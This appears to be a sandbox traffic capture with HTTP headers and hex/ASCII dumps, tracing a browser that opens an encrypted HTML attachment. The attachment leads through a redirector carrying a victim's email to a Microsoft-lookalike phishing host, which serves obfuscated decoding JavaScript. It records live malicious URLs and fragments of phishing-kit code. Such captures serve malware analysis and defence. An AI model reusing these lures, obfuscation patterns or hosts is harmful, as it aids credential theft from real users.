                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Sec-Fetch-Site: none
                        Sec-Fetch-Mode: navigate
                        Sec-Fetch-User: ?1
                        Sec-Fetch-Dest: document
                        Accept-Encoding: gzip, deflate, br, zstd
                        Accept-Language: en-US,en;q=0.9
                        2025-04-10 17:21:08 UTC623INHTTP/1.1 200 OK
                        Connection: close
                        Content-Length: 1872
                        Content-Type: application/octet-stream
                        Cache-Control: public, max-age=31556926, immutable
                        Content-Disposition: attachment; filename=8ff754f5-7513-4298-9573-17aa31ff5b5c.html
                        ETag: "eb64d302c3e2871c4707f72637527fb5"
                        Last-Modified: Thu, 10 Apr 2025 17:16:36 GMT
                        Server: Uploadcare
                        X-Robots-Tag: noindex, nofollow, nosnippet, noarchive
                        Access-Control-Allow-Origin: *
                        Access-Control-Allow-Methods: HEAD, GET, OPTIONS
                        Access-Control-Expose-Headers: HEAD, GET, OPTIONS
                        Accept-Ranges: bytes
                        Age: 0
                        Date: Thu, 10 Apr 2025 17:21:08 GMT
                        x-cache: MISS-CLUSTER
                        2025-04-10 17:21:08 UTC1378INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 31 2e 31 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73
                        Data Ascii: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js"></s
                        2025-04-10 17:21:08 UTC494INData Raw: 20 7b 20 6e 61 6d 65 3a 20 27 41 45 53 2d 47 43 4d 27 2c 20 69 76 3a 20 68 6b 6b 66 69 69 65 63 2c 20 61 64 64 69 74 69 6f 6e 61 6c 44 61 74 61 3a 20 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 29 2c 20 74 61 67 4c 65 6e 67 74 68 3a 20 31 32 38 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 72 79 70 74 6f 4b 65 79 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 5b 2e 2e 2e 49 53 2c 20 2e 2e 2e 74 61 67 5d 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 64 65 63 6f 64 65 72 20 3d 20 6e 65 77 20 54 65 78 74 44 65 63 6f 64 65 72 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 6d 65 73 73 61 67 65 20 3d 20 64 65 63 6f
                        Data Ascii: { name: 'AES-GCM', iv: hkkfiiec, additionalData: new Uint8Array(), tagLength: 128 }, cryptoKey, new Uint8Array([...IS, ...tag]) ); const decoder = new TextDecoder(); const message = deco


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.649700104.17.24.144434840C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2025-04-10 17:21:09 UTC567OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                        Host: cdnjs.cloudflare.com
                        Connection: keep-alive
                        sec-ch-ua-platform: "Windows"
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                        sec-ch-ua-mobile: ?0
                        Accept: */*
                        Sec-Fetch-Site: cross-site
                        Sec-Fetch-Mode: no-cors
                        Sec-Fetch-Dest: script
                        Sec-Fetch-Storage-Access: active
                        Accept-Encoding: gzip, deflate, br, zstd
                        Accept-Language: en-US,en;q=0.9
                        2025-04-10 17:21:09 UTC964INHTTP/1.1 200 OK
                        Date: Thu, 10 Apr 2025 17:21:09 GMT
                        Content-Type: application/javascript; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Cf-Ray: 92e3eb43aafede96-EWR
                        Server: cloudflare
                        Access-Control-Allow-Origin: *
                        Cache-Control: public, max-age=30672000
                        Etag: W/"61182885-40eb"
                        Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                        Cf-Cdnjs-Via: cfworker/kv
                        Cross-Origin-Resource-Policy: cross-origin
                        Timing-Allow-Origin: *
                        X-Content-Type-Options: nosniff
                        Cf-Cache-Status: HIT
                        Age: 363539
                        Expires: Tue, 31 Mar 2026 17:21:09 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Iwx0DF9dUHgGZDytFHHld36pgAPEHSvqZsw5EAOoGK7yiMFaTGLG4%2BICoh4KlRIc4iJKOTGALwJ%2FwwCSla7VMWoxT8te%2BpQ1kOG8MOnxz2CicY3QlPOB%2By6a%2BNKi7yVA7JbZ%2BOEd"}],"group":"cf-nel","max_age":604800}
                        Nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                        Strict-Transport-Security: max-age=15780000
                        alt-svc: h3=":443"; ma=86400
                        2025-04-10 17:21:09 UTC405INData Raw: 35 62 65 62 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                        Data Ascii: 5beb!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                        2025-04-10 17:21:09 UTC1369INData Raw: 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63
                        Data Ascii: typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Objec
                        2025-04-10 17:21:09 UTC1369INData Raw: 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d
                        Data Ascii: lone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.random
                        2025-04-10 17:21:09 UTC1369INData Raw: 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d
                        Data Ascii: "==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=
                        2025-04-10 17:21:09 UTC1369INData Raw: 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b
                        Data Ascii: {for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[
                        2025-04-10 17:21:09 UTC1369INData Raw: 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31
                        Data Ascii: ?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<1
                        2025-04-10 17:21:09 UTC1369INData Raw: 62 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67
                        Data Ascii: buffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={string
                        2025-04-10 17:21:09 UTC1369INData Raw: 6f 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b
                        Data Ascii: o=r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJK
                        2025-04-10 17:21:09 UTC1369INData Raw: 2e 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20
                        Data Ascii: .abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var
                        2025-04-10 17:21:09 UTC1369INData Raw: 41 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77
                        Data Ascii: A[39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.649703167.172.166.2264434840C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2025-04-10 17:21:10 UTC698OUTGET /aruberg@grahamgoldentech.com HTTP/1.1
                        Host: 33vh88.perthshiregardenrooms.co.uk
                        Connection: keep-alive
                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                        sec-ch-ua-mobile: ?0
                        sec-ch-ua-platform: "Windows"
                        Upgrade-Insecure-Requests: 1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Sec-Fetch-Site: cross-site
                        Sec-Fetch-Mode: navigate
                        Sec-Fetch-Dest: document
                        Accept-Encoding: gzip, deflate, br, zstd
                        Accept-Language: en-US,en;q=0.9
                        2025-04-10 17:21:10 UTC475INHTTP/1.1 302 Found
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 10 Apr 2025 17:21:10 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 198
                        Connection: close
                        X-Powered-By: Express
                        X-RateLimit-Limit: 2e+31
                        X-RateLimit-Remaining: 2e+31
                        X-RateLimit-Reset: 1744306571
                        Location: https://da48b13627.vk.com@microsoftonelineda48b13627.cometlogistics.co.uk/?_da48b13627=bnBkL2lkZnVvZmVtcGhuYmlic2hBaHNmY3ZzYiRpcTBmZS9mbWpnZWZzYml0ZWJwbW94cGUwMDt0cXV1aQ
                        Vary: Accept
                        2025-04-10 17:21:10 UTC198INData Raw: 3c 70 3e 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 64 61 34 38 62 31 33 36 32 37 2e 76 6b 2e 63 6f 6d 40 6d 69 63 72 6f 73 6f 66 74 6f 6e 65 6c 69 6e 65 64 61 34 38 62 31 33 36 32 37 2e 63 6f 6d 65 74 6c 6f 67 69 73 74 69 63 73 2e 63 6f 2e 75 6b 2f 3f 5f 64 61 34 38 62 31 33 36 32 37 3d 62 6e 42 6b 4c 32 6c 6b 5a 6e 56 76 5a 6d 56 74 63 47 68 75 59 6d 6c 69 63 32 68 42 61 48 4e 6d 59 33 5a 7a 59 69 52 70 63 54 42 6d 5a 53 39 6d 62 57 70 6e 5a 57 5a 7a 59 6d 6c 30 5a 57 4a 77 62 57 39 34 63 47 55 77 4d 44 74 30 63 58 56 31 61 51 3c 2f 70 3e
                        Data Ascii: <p>Found. Redirecting to https://da48b13627.vk.com@microsoftonelineda48b13627.cometlogistics.co.uk/?_da48b13627=bnBkL2lkZnVvZmVtcGhuYmlic2hBaHNmY3ZzYiRpcTBmZS9mbWpnZWZzYml0ZWJwbW94cGUwMDt0cXV1aQ</p>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.649704167.172.166.2264434840C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2025-04-10 17:21:11 UTC778OUTGET /?_da48b13627=bnBkL2lkZnVvZmVtcGhuYmlic2hBaHNmY3ZzYiRpcTBmZS9mbWpnZWZzYml0ZWJwbW94cGUwMDt0cXV1aQ HTTP/1.1
                        Host: microsoftonelineda48b13627.cometlogistics.co.uk
                        Connection: keep-alive
                        Upgrade-Insecure-Requests: 1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Sec-Fetch-Site: cross-site
                        Sec-Fetch-Mode: navigate
                        Sec-Fetch-Dest: document
                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                        sec-ch-ua-mobile: ?0
                        sec-ch-ua-platform: "Windows"
                        Accept-Encoding: gzip, deflate, br, zstd
                        Accept-Language: en-US,en;q=0.9
                        2025-04-10 17:21:12 UTC320INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 10 Apr 2025 17:21:11 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 351
                        Connection: close
                        X-Powered-By: Express
                        X-RateLimit-Limit: 2e+31
                        X-RateLimit-Remaining: 2e+31
                        X-RateLimit-Reset: 1744306571
                        ETag: W/"15f-3M0a/pOvegNm6djT5a7IX2bYDBE"
                        2025-04-10 17:21:12 UTC351INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 3e 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 62 3d 61 74 6f 62 28 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 2e 73 6c 69 63 65 28 31 29 2e 73 70 6c 69 74 28 22 3d 22 29 5b 31 5d 29 3b 0a 76 61 72 20 64 3d 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 62 2e 73 70 6c 69 74 28 22 22 29 2e 72 65 76 65 72 73 65 28 29 2e 6a 6f 69 6e 28 22 22 29 29 0a 2e 73 70 6c 69 74 28 22 22 29 2e 6d 61 70 28 63 3d 3e 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 63 2e 63 68
                        Data Ascii: <!DOCTYPE html><html><head><meta charset="UTF-8"><title></title></head><body><script>!function(){try{var b=atob(location.search.slice(1).split("=")[1]);var d=decodeURIComponent(b.split("").reverse().join("")).split("").map(c=>String.fromCharCode(c.ch


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.2.649706104.21.7.1204434840C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2025-04-10 17:21:12 UTC726OUTGET /ph HTTP/1.1
                        Host: downloadsharedfile.de
                        Connection: keep-alive
                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                        sec-ch-ua-mobile: ?0
                        sec-ch-ua-platform: "Windows"
                        Upgrade-Insecure-Requests: 1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Sec-Fetch-Site: cross-site
                        Sec-Fetch-Mode: navigate
                        Sec-Fetch-Dest: document
                        Referer: https://microsoftonelineda48b13627.cometlogistics.co.uk/
